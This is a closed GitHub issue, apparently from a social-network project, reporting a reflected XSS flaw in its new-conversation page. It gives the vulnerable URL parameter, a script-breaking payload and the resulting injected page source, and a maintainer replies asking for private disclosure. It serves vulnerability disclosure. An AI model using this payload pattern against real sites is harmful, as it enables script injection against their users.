Reflected XSS Vulnerability #4010

Closed
BitBitmap opened this Issue Feb 26, 2013 · 1 comment

Comments

Projects
None yet
2 participants
@BitBitmap

There's a reflected XSS in the window where you send a message to another user.

The URL path is /conversations/new?contact_id=XXX&name= where XXX is a valid contact_id. You can add

</script><script>alert(1);</script>

to name= to execute a reflected XSS attack.

The source would look like this after the XSS:

<script>
  $(document).ready(function () {
    var data = $.parseJSON( "[{\"value\":1719514,\"name\":\"test test\"}]" ),
        autocompleteInput = $("#contact_autocomplete");

    autocompleteInput.autoSuggest(data, {
      selectedItemProp: "name",
      searchObjProps: "name",
      asHtmlID: "contact_ids",
      retrieveLimit: 10,
      minChars: 1,
      keyDelay: 0,
      startText: '',
      emptyText: 'No Results Found',
      preFill: [{name : "</script><script>alert(1)</script>",
                 value : "1719514"}]
      });
    autocompleteInput.focus();
  });
</script>

If needed, I can replicate this attack for you. This reflected XSS does not work in a few browsers like IE and Google Chrome because of XSS filtering.

@jhass

This comment has been minimized.

Show comment
Hide comment
@jhass

jhass Feb 26, 2013

Member

Thank you for notifying us of this.

However for the next time we would welcome a more responsible disclosure via any means of non public communication very much.

Member

jhass commented Feb 26, 2013

Thank you for notifying us of this.

However for the next time we would welcome a more responsible disclosure via any means of non public communication very much.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment